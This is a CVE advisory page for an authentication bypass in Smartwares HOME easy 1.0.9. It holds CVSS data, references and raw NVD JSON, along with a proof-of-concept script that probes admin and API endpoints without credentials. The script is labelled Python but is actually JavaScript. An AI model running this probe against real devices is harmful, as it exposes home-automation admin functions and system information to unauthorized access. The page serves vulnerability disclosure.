CVE-2019-25235

Description

Smartwares HOME easy 1.0.9 contains an authentication bypass vulnerability that allows unauthenticated attackers to access administrative web pages by disabling JavaScript. Attackers can navigate to multiple administrative endpoints and to bypass client-side validation and access sensitive system information.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Smartwares HOME easy <= 1.0.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2019-25235 PoC - Authentication Bypass via JavaScript Disable
// Target: Smartwares HOME easy 1.0.9

const http = require('http');

// Configuration
const targetHost = '192.168.1.100'; // Replace with target IP
const targetPort = 8080;

// Step 1: Bypass authentication by disabling JavaScript validation
// In browser, simply disable JavaScript and access admin pages directly

// Step 2: Direct access to admin endpoints without authentication
const adminEndpoints = [
    '/admin',
    '/admin/settings',
    '/admin/users',
    '/admin/network',
    '/admin/devices',
    '/api/system/info',
    '/api/config/get'
];

function sendRequest(endpoint) {
    const options = {
        hostname: targetHost,
        port: targetPort,
        path: endpoint,
        method: 'GET',
        headers: {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
            'Accept': 'text/html,application/xhtml+xml',
            // No authentication cookies required due to vulnerability
        }
    };

    const req = http.request(options, (res) => {
        console.log(`[+] Endpoint: ${endpoint}`);
        console.log(`    Status: ${res.statusCode}`);
        console.log(`    Content-Length: ${res.headers['content-length'] || 'unknown'}`);
        console.log('---');
    });

    req.on('error', (e) => {
        console.error(`[-] Error accessing ${endpoint}: ${e.message}`);
    });

    req.end();
}

// Execute PoC
console.log('[+] CVE-2019-25235 PoC Execution');
console.log('[+] Bypassing authentication via JavaScript disable...\n');

adminEndpoints.forEach(endpoint => {
    sendRequest(endpoint);
});

// Step 3: Alternative - Use browser console to disable JS and navigate to:
// http://target:8080/admin
// http://target:8080/admin/settings
// http://target:8080/api/system/info

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25235
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25235
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25235/
[4] VulDB https://vuldb.com/cve/CVE-2019-25235
[5] https://www.exploit-db.com/exploits/47595
[6] https://www.smartwares.eu
[7] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5540.php
[8] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5540.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25235", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:51.070", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Smartwares HOME easy 1.0.9 contains an authentication bypass vulnerability that allows unauthenticated attackers to access administrative web pages by disabling JavaScript. Attackers can navigate to multiple administrative endpoints and to bypass client-side validation and access sensitive system information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/47595", "source": "[email protected]"}, {"url": "https://www.smartwares.eu", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5540.php", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5540.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}